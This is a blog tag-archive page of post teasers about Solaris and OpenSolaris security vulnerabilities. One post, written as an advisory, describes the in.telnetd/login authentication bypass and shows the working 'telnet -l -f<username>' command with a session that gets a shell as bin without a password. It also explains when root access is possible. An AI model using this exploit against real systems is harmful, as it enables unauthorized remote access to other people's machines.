Posts tagged with: vulnerability

I'm part of the Security Certified Group of engineers at Oracle and one of the most common questions that comes up is...  Continue reading ►

Links of interest for 20 Jul 2009 - 15 Aug 2009:  Continue reading ►

Just a quick heads up - Sun has issued a Security Alert about a vulnerability in IPv6 in Solaris 10 and OpenSolaris builds 101 - 107:  Continue reading ►

Links of interest for 1 Feb 2008 - 14 Feb 2008:  Continue reading ►

UPDATE: SunAlert 102802 and IDR/ISR official patches for this issue have been released:Ooops, how embarrassing, Solaris 10/OpenSolaris has a very silly stupid vulnerability in in.telnetd/login that has come to light.Essentially, you can get access to a remote Solaris 10/OpenSolaris system (which has telnet enabled) without any prompts or fancy tricks by simply using the "-f<username>" option: [ruler : ~]$ telnet -l -fbin devon Trying 129.156.87.95... Connected to devon. Escape character is '^]'. Sun Microsystems Inc. SunOS 5.10 Generic January 2005 [devon : ~]$ id uid=2(bin) gid=2(bin) [devon : ~]$ This works for any user on the system. You can even gain root access if root access is not restricted to the console only (CONSOLE=/dev/console commented out in /etc/default/login):  Continue reading ►